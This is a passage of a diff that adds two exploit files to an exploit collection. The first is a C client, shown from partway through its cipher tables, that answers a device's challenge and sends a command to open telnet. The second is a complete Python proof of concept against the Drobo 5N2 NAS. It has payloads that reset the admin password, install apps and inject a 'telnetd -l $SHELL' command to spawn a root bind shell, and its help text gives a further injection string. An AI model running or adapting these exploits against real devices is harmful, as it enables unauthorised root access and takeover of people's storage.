+    0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,
+    0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,
+    0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,
+    0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,
+    0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,
+    0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,
+    0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,
+    0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,
+    0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,
+    0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,
+    0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,
+    0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,
+    0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,
+    0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,
+    0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,
+    0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,
+    0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,
+    0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,
+    0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,
+    0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,
+    0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,
+    0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,
+    0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,
+    0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,
+    0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,
+    0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,
+    0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,
+    0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,
+    0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,
+    0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
+    0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,
+    0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
+    0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,
+    0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
+    0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,
+    0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
+    0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,
+    0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,
+    0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,
+    0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,
+    0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,
+    0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,
+    0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
+    0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,
+    0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
+    0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
+    0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,
+    0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
+    0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,
+    0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
+    0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,
+    0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,
+    0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20
+};
+
+void init_cipher_offset_vector(byte *dst,byte *src,int size)
+
+{
+  int i;
+  
+  i = 0;
+  while (i < size) {
+    dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;
+    i = i + 1;
+  }
+  return;
+}
+
+void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)
+
+{
+  int i;
+  
+  i = 0;
+  while (i < (int)size) {
+    state[i] = src[(uint)offset_vector[i] - 1];
+    i = i + 1;
+  }
+  memcpy(dst,state,size);
+  return;
+}
+
+void cipher_memcpy_shuffle(void *dst,size_t size)
+
+{
+  memcpy(state,dst,size);
+  memcpy(dst,(void *)(dst + size),0x1c - size);
+  memcpy((void *)(dst + (0x1c - size)),state,size);
+  return;
+}
+
+void init_cipher_state(void *dst,void *src)
+
+{
+  byte current_byte;
+  int i;
+  
+  init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);
+  apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);
+  i = 0;
+  do {
+    current_byte = (datum + 0x310)[i];
+    i = i + 1;
+    cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);
+    cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);
+    apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);
+    dst = (byte *)dst + 0x30;
+  } while (i != 0x10);
+  return;
+}
+
+void cipher_xor(byte *data,byte *key,int size)
+
+{
+  int i;
+
+  i = 0;
+  while (i < size) {
+    data[i] = key[i] ^ data[i];
+    i = i + 1;
+  }
+  return;
+}
+
+void prepare_key(void *key,size_t key_size)
+
+{
+  size_t __n;
+
+  memset(state + 0x1d0,0,0x10);
+  __n = key_size;
+  if (0xf < (int)key_size) {
+    __n = 0x10;
+  }
+  memcpy(state + 0x1d0,key,__n);
+  init_cipher_state(state + 0x1e0,state + 0x1d0);
+  if (8 < (int)key_size) {
+    init_cipher_state(state + 0x4e0,state + 0x1d8);
+  }
+  *(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size
+  return;
+}
+
+void cipher_shuffle(byte *dst,byte *src)
+
+{
+  byte *caretPtr;
+  int iVar1;
+  byte *ptr;
+  int i;
+  
+  apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);
+  cipher_xor(state + 0x100,src,0x30);
+  ptr = state + 0x100;
+  i = 0;
+  do {
+    iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;
+    caretPtr = dst + i;
+    i = i + 4;
+    init_cipher_offset_vector
+              (caretPtr,datum + 0x30 +
+                        (uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +
+                        iVar1 * 0x10,4);
+    ptr = ptr + 6;
+  } while (i != 0x20);
+  apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);
+  return;
+}
+
+void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)
+
+{
+  uint i;
+  byte *backward_ov_ptr;
+  byte *forward_ov_ptr;
+  int iVar3;
+
+  init_cipher_offset_vector(state + 0x130,data,0x40);
+  apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);
+  if (direction == 0) {
+    forward_ov_ptr = offset_vector + 0x300;
+    do {
+      memcpy(state + 0x170,state + 0x150,0x20);
+      cipher_shuffle(state + 0x150,offset_vector);
+      cipher_xor(state + 0x150,state + 0x130,0x20);
+      memcpy(state + 0x130, state + 0x170, 0x20);
+      offset_vector = offset_vector + 0x30;
+    } while (offset_vector != forward_ov_ptr);
+  }
+  else {
+    backward_ov_ptr = offset_vector + 0x2d0;
+    do {
+      memcpy(state + 0x170,state + 0x130,0x20);
+      cipher_shuffle(state + 0x130,backward_ov_ptr);
+      cipher_xor(state + 0x130,state + 0x150,0x20);
+      backward_ov_ptr -= 0x30;
+      memcpy(state + 0x150,state + 0x170,0x20);
+    } while (backward_ov_ptr != offset_vector + -0x30);
+  }
+  apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);
+  memset(result,0,8);
+  i = 0;
+  do {
+    result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);
+    i = i + 1;
+  } while (i != 0x40);
+  return;
+}
+
+int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)
+
+{
+  uint short_key_iter;
+  int curBlockNumber;
+  int blockCount;
+
+  if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))
+     && ((data_len + 7 & 0xfffffff8) != 0)) {
+    prepare_key(key,key_len);
+    blockCount = (int)(data_len + 7) >> 3;
+    short_key_iter = *(state + 0x7e0);
+    if (*(state + 0x7e0) == 0) {
+      while ((int)short_key_iter < blockCount) {
+        cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
+        short_key_iter = short_key_iter + 1;
+        result = (char *)((byte *)result + 8);
+        data = (char *)((byte *)data + 8);
+      }
+    }
+    else {
+      while (curBlockNumber < blockCount) {
+        cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
+        cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);
+        cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);
+        curBlockNumber = curBlockNumber + 1;
+        result = (char *)((byte *)result + 8);
+        data = (char *)((byte *)data + 8);
+      }
+    }
+    return 0;
+  }
+  return -1;
+}
+
+int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)
+
+{
+  uint uVar2;
+  int currentBlockNumber;
+  int blocksCount;
+  
+  if (((result != (char *)0x0 && data != (char *)0x0) &&
+      (currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {
+    prepare_key(key,key_size);
+    blocksCount = (int)(data_len + 7) >> 3;
+    uVar2 = *(state + 0x7e0);
+    if (*(state + 0x7e0) == 0) {
+      while ((int)uVar2 < blocksCount) {
+        cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
+        uVar2 = uVar2 + 1;
+        result = (char *)((byte *)result + 8);
+        data = (char *)((byte *)data + 8);
+      }
+    }
+    else {
+      while (currentBlockNumber < blocksCount) {
+        cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
+        cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);
+        cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);
+        currentBlockNumber = currentBlockNumber + 1;
+        result = (char *)((byte *)result + 8);
+        data = (char *)((byte *)data + 8);
+      }
+    }
+    return 0;
+  }
+  return -1;
+}
+
+void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)
+{
+    unsigned char * pin = in;
+    const char * hex = "0123456789ABCDEF";
+    char * pout = out;
+    for(; pin < in+insz; pout +=3, pin++){
+        pout[0] = hex[(*pin>>4) & 0xF];
+        pout[1] = hex[ *pin     & 0xF];
+        pout[2] = ':';
+        if (pout + 3 - out > outsz){
+            /* Better to truncate output string than overflow buffer */
+            /* it would be still better to either return a status */
+            /* or ensure the target buffer is large enough and it never happen */
+            break;
+        }
+    }
+    pout[-1] = 0;
+}
+
+char netbuf[4096];
+
+#define PADDED(X) (((X + 7) / 8) * 8)
+#define PORT 9530
+#define BUFSIZE sizeof(netbuf)
+#define CMD_FIRST "OpenTelnet:OpenOnce"
+#define CHALLENGE_PROLOGUE "randNum:"
+#define VERIFY_OK "verify:OK"
+#define CMD_FINAL "CMD:"
+#define FINAL_PAYLOAD "Telnet:OpenOnce"
+#define OPEN_OK "Open:OK"
+
+ssize_t send_str(int sockfd, char *str, size_t len) {
+    if (len > 0xFE) {
+        return -1;
+    }
+    char buf[len+1];
+    buf[0] = len + 1;
+    memcpy(buf + 1, str, len);
+    return send(sockfd, buf, len + 1, 0);
+}
+
+int main(int argc, char* argv[]) {
+    int sockfd, numbytes;
+    struct hostent *he;
+    struct sockaddr_in their_addr;
+
+    if (argc != 3) {
+        fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);
+        return 2;
+    }
+
+    if ((he=gethostbyname(argv[1])) == NULL) {  /* get the host info */
+        herror("gethostbyname");
+        return 1;
+    }
+
+    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
+        perror("socket");
+        return 1;
+    }
+
+    their_addr.sin_family = AF_INET;      /* host byte order */
+    their_addr.sin_port = htons(PORT);    /* short, network byte order */
+    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
+    bzero(&(their_addr.sin_zero), 8);     /* zero the rest of the struct */
+
+    if (connect(sockfd, (struct sockaddr *)&their_addr, \
+                                              sizeof(struct sockaddr)) == -1) {
+        perror("connect");
+        return 1;
+    }
+    if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {
+        perror("send");
+        return 1;
+    }
+    printf("Sent %s command.\n", CMD_FIRST);
+    bzero(netbuf, BUFSIZE);
+    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
+        perror("recv");
+        return 1;
+    }
+    puts(netbuf);
+    if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {
+        fprintf(stderr, "No challenge received.\n");
+        return 3;
+    }
+
+    char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;
+    char challengeStr[strlen(seed) + strlen(argv[2]) + 1];
+    size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);
+    printf("challenge=%s\n", challengeStr);
+
+    char encryptedRandomSeed[PADDED(challengeLen)];
+    encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);
+    memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);
+    memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));
+    if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {
+        perror("send");
+        return 1;
+    }
+    bzero(netbuf, BUFSIZE);
+    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
+        perror("recv");
+        return 1;
+    }
+    puts(netbuf);
+    if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {
+        fprintf(stderr, "Verification failed.\n");
+        return 4;
+    }
+    char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];
+    encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);
+    memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);
+    memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));
+    if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {
+        perror("send");
+        return 1;
+    }
+    bzero(netbuf, BUFSIZE);
+    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
+        perror("recv");
+        return 1;
+    }
+    puts(netbuf);
+    if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {
+        fprintf(stderr, "Open failed.\n");
+        return 5;
+    }
+    
+    return 0;
+}
+
+#
\ No newline at end of file
diff --git a/exploits/hardware/remote/48214.py b/exploits/hardware/remote/48214.py
new file mode 100755
index 000000000..902e90630
--- /dev/null
+++ b/exploits/hardware/remote/48214.py
@@ -0,0 +1,247 @@
+# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection
+# Date: 2020-03-12
+# Exploit Author: Rick Ramgattie, Ian Sindermann
+# Vendor Homepage: https://www.drobo.com/
+# Version: 4.1.1 and lower.
+# CVE: CVE-2018-14709, CVE-2018-14701
+###
+
+#!/usr/bin/env python3
+
+# nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.
+# This utility leverages the lack of any real authentication mechanism to perform arbitrary actions.
+# These actions include:
+# - Getting device status.
+# - Installing applications.
+# - Resetting admin credentials.
+# - Popping root shells.
+# - Turning on party mode.
+# This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower.
+# As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified.
+# Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified.
+# These vulnerabilities were disclosed to the manufacturer on 2018-07-10.
+# More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc
+###
+# Product of ISE Labs.
+# - http://www.securityevaluators.com/
+# - @ISESecurity
+###
+
+
+# RE Notes:
+#                                 ,-- Encryption bool?
+# Handshake Preamble:       *    /\
+# 44 52 49 4e 45 54 54 4d  07 01 00 00 00 00 00 88
+# \_____________________/  \_________/ \_________/
+#  Static string.           To/from     Size of
+#  "DIRNETTM"               server?     next message
+#
+# Handshake
+# 64 72 61 31 37 33 32 30  32 33 30 30 30 31 30 00  00 00 00 00 64 72 61 31  37 33 32 30 32 33 30 30  30 31 30 00 00 00 00 00  00 00...
+# \______________________________________________/  \_________/ \_______________________________________________/ \_________________-->
+#  Device serial number with NULL padding.           NULL        Device serial number with NULL padding. ESAID?    88 bytes of NULL
+#  "dra173202300010"                                             "dra173202300010"
+#
+# The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2).
+# One of the serial numbers in this packet may actually be the ESAID.
+#
+# Preamble:                 *
+# 44 52 49 4e 45 54 54 4d  0a 01 00 00 00 00 00 88
+# \_____________________/  \_________/ \_________/
+#  Static string.           To/from     Size of
+#  "DIRNETTM"               server?     next message
+#
+# Message:
+# XX XX XX XX XX XX XX XX  00
+# \_____________________/  \/
+# Arbitrary length string  NULL terminator
+#
+#
+# Protocol flow:
+#   Initial handshake:         ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why?
+#   |  c -> s: Preamble.    <-'    \_
+#   |  c -> s: Message: Handshake  / `- These two are normally sent as one packet.
+#   v  c <- s: Preamble.    <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why?
+#   Loop:
+#   +> c -> s: Preamble.
+#   |  c -> s: Message: Command.
+#   |  c <- s: Preamble.
+#   +- c <- s: Message: Results.  > Large responses are split into chunks. Must use size from preamble.
+
+
+import argparse
+import logging
+import re
+import socket
+import struct
+import sys
+
+
+LOG_FORMAT = '[%(levelname)s]: %(message)s'
+BUFFER_SIZE = 1024
+HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00'
+PREAMBLE           = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00'
+PREAMBLE_LEN = 16
+
+# Note: Payloads usually contain the device's serial number. Replace this with
+# '{serial}' so `send_msg` can insert the target's serial.
+PAYLOADS = {
+    "daccess" :'<TMCmd><CmdID>78</CmdID><Params><Name>DroboAccess</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "dropbear":'<TMCmd><CmdID>78</CmdID><Params><Name>dropbear</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "getadmin":'<TMCmd><CmdID>30</CmdID><Params><DRINasAdminConfig>DRINasAdminConfig</DRINasAdminConfig><DRINasDroboAppsConfig>DRINasDroboAppsConfig</DRINasDroboAppsConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "getnet"  :'<TMCmd><CmdID>30</CmdID><ESAID>{serial}</ESAID><Params><Network>Network</Network></Params></TMCmd>',
+    "gettemp" :'<TMCmd><CmdID>61</CmdID><ESAID>{serial}</ESAID></TMCmd>',
+    "partyon" :'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>900</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "partyoff":'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>0</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "popit"   :'<TMCmd><CmdID>78</CmdID><Params><Name>Drobo`telnetd -l $SHELL -p 8383`Access</Name><Action>Install</Action><Data>bork</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "restart" :'<TMCmd><CmdID>21</CmdID><ESAID>{serial}</ESAID></TMCmd>',
+    "setadmin":'<TMCmd><CmdID>31</CmdID><Params><DRINASConfig><DRINasAdminConfig><UserName>admin</UserName><Password>ono</Password><ValidPassword>1</ValidPassword><EncryptedPassword>0</EncryptedPassword></DRINasAdminConfig><DRINasDroboAppsConfig><Version>11</Version><Enabled>1</Enabled></DRINasDroboAppsConfig></DRINASConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "test"    :'<TMCmd><CmdID>82</CmdID><Params><Time>1521161215</Time><GMTOffset>4294966876</GMTOffset></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "stdin"   :'Handled elsewhere.'}
+
+DEFAULT_PORT_STAT = 5000
+DEFAULT_PORT_CMD = 5001
+DEFAULT_TIMEOUT = None
+HELP_EPILOG='''
+PAYLOADS
+  daccess  - Installs DroboAccess on the target device. At the time of writing,
+             DroboAccess has numerous unauthenticated command injection
+             vulnerabilities. Try the following:
+             GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383
+             - A long delay and response of "<Error>0</Error>" is expected.
+  dropbear - Installs dropbear on the target device.
+             - A response of "<Error>0</Error>" is expected.
+  getadmin - Returns the target's current (redacted) admin configuration.
+  gettemp  - Returns the target's system info (temperature and uptime).
+  getnet   - Returns the target's network info.
+  partyon  - Enables "party mode" on the target. This will cause the target
+             device's lights to blink for 15 minutes.
+  partyoff - Prematurely disables "party mode".
+  popit    - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383.
+             - A response of "<Error>1</Error>" is expected.
+  restart  - Restarts the target device.
+  setadmin - Sets administrative options on the target.
+             - Username: admin
+             - Password: ono
+             - Apps enabled: yes
+  stdin    - Reads data from STDIN and sends it as a command.
+'''
+
+
+def recv_message(s):
+    preamble = s.recv(PREAMBLE_LEN)
+    msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble.
+    message = ''
+    if msg_len <= 0:
+        return(message)
+    while True:
+        message += s.recv(BUFFER_SIZE).decode('utf-8')
+        if len(message) >= msg_len:
+            return(message) # There will be a null at the end. It should be fine.
+
+
+def send_handshake(s, serial):
+    serial_bytes = serial.encode('utf-8')
+    hs_body  = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number.
+    hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero.
+    hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again...
+    hs_body += struct.pack("184x") # 184 bytes of NULL padding.
+    size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble.
+    hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body
+    logging.debug(repr(hs_data))
+    s.send(hs_data)
+
+
+def send_message(s, serial, message):
+    msg_body = message.format(serial=serial) # Add target device's serial number.
+    msg_body_bytes = msg_body.encode('utf-8')
+    msg_body_bytes += struct.pack("x") # NULL terminator.
+    size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble.
+    msg_data = PREAMBLE + size_bytes + msg_body_bytes
+    logging.debug(repr(msg_data))
+    s.send(msg_data)
+
+
+aparser = argparse.ArgumentParser(
+        description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.',
+        epilog=HELP_EPILOG,
+        formatter_class=argparse.RawDescriptionHelpFormatter)
+aparser.add_argument("host", help='Host or IP address of the target Drobo.')
+aparser.add_argument("payload", help='Payload to use. See PAYLOADS.')
+aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int)
+aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int)
+aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.')
+aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float)
+aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true')
+args = aparser.parse_args()
+
+# Basic check for color support.
+if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]:
+    logging.addLevelName(logging.NOTSET,   "\033[39m????\033[0m")
+    logging.addLevelName(logging.DEBUG,    "\033[37mDBUG\033[0m")
+    logging.addLevelName(logging.INFO,     "\033[96mINFO\033[0m")
+    logging.addLevelName(logging.WARNING,  "\033[93mWARN\033[0m")
+    logging.addLevelName(logging.ERROR,    "\033[95mERRR\033[0m")
+    logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m")
+else: 
+    logging.addLevelName(logging.NOTSET,   "????")
+    logging.addLevelName(logging.DEBUG,    "DBUG")
+    logging.addLevelName(logging.INFO,     "INFO")
+    logging.addLevelName(logging.WARNING,  "WARN")
+    logging.addLevelName(logging.ERROR,    "ERRR")
+    logging.addLevelName(logging.CRITICAL, "CRIT")
+
+if args.verbose:
+    logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG)
+else:
+    logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)
+
+if args.payload == 'stdin':
+    logging.info("Reading payload from STDIN.")
+    payload_xml = sys.stdin.read()
+    logging.debug(payload_xml)
+else:
+    payload_xml = PAYLOADS[args.payload]
+
+
+logging.info("Connecting...")
+# Connect to the stat port. This is required for the cmd port to work.
+# The stat port also gives us the serial number.
+sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock_stat.settimeout(args.timeout)
+sock_stat.connect((args.host, args.portstat))
+# Connect to the cmd port.
+sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock_cmd.settimeout(args.timeout)
+sock_cmd.connect((args.host, args.portcmd))
+
+# Pull the serial number from the stat port.
+logging.info("Pulling serial number...")
+stat_msg = sock_stat.recv(BUFFER_SIZE)
+if args.serial:
+    serial = args.serial
+else:
+    m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8'))
+    if not m:
+        logging.critical("Could not determine target's serial number!")
+        logging.debug(stat_msg)
+        sys.exit(100)
+    serial = m.group(1)
+    logging.info("Identified serial: " + serial)
+
+# Perform a handshake with the cmd port. Requires the serial num.
+logging.info('Performing handshake...')
+send_handshake(sock_cmd, serial)
+recv_message(sock_cmd) # Blank response - trash.
+
+# Send the payload.
+logging.info("Sending payload...")
+send_message(sock_cmd, serial, payload_xml)
+logging.info("Waiting for response...")
+resp = recv_message(sock_cmd)
+logging.info("Response:\n" + resp)
+
+# Cleanup.
+sock_cmd.close()
+sock_stat.close()
+logging.info("Donezo.")
\ No newline at end of file
